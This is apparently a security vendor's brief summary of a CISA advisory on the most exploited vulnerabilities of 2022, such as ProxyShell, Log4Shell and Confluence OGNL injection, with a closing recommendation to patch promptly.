The list of the top twelve exploited vulnerabilities in 2022, as reported by the CISA Advisory, includes:

  1. CVE-2018-13379: Affecting Fortinet SSL VPNs, this vulnerability was also among the most frequently exploited in 2020 and 2021.
  2. CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523: Known collectively as "ProxyShell," these vulnerabilities affect Microsoft Exchange email servers. They target the Microsoft Client Access Service (CAS), which typically listens on port 443 and is commonly exposed to the internet so that users can reach email from mobile devices and web browsers.
  3. CVE-2021-40539: A remote code execution (RCE) vulnerability in Zoho ManageEngine ADSelfService Plus, attributed to an outdated third-party dependency. CISA has reported active exploitation by advanced persistent threat (APT) actors.
  4. CVE-2021-26084: Affecting Atlassian Confluence Server and Data Center, this vulnerability allows unauthenticated attackers to execute arbitrary code. Exploitation surged after proof-of-concept code was released.
  5. CVE-2021-44228: Known as Log4Shell, this affects the Apache Log4j library. An attacker submits a crafted request that causes the library to execute attacker-controlled code, giving full control of the system.
  6. CVE-2022-22954 and CVE-2022-22960: These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products.
  7. CVE-2022-1388: Affecting F5 BIG-IP application delivery and security software, this vulnerability allows unauthenticated attackers to bypass iControl REST authentication.
  8. CVE-2022-30190: This vulnerability in the Microsoft Support Diagnostic Tool (MSDT) allows a remote, unauthenticated attacker to take control of the system.
  9. CVE-2022-26134: Initially exploited as a zero-day, this vulnerability affects Atlassian Confluence Server and Data Center. It is an Object-Graph Navigation Language (OGNL) injection flaw that allows unauthenticated attackers to execute arbitrary code on the vulnerable system.

Access Point recommends immediate action to remediate any of these vulnerabilities present in your environment. Unpatched vulnerabilities significantly elevate the risk of attack. Maintain a regular patching cadence, and monitor for and prioritize vulnerabilities that are being actively exploited, to minimize exposure and protect your organization.
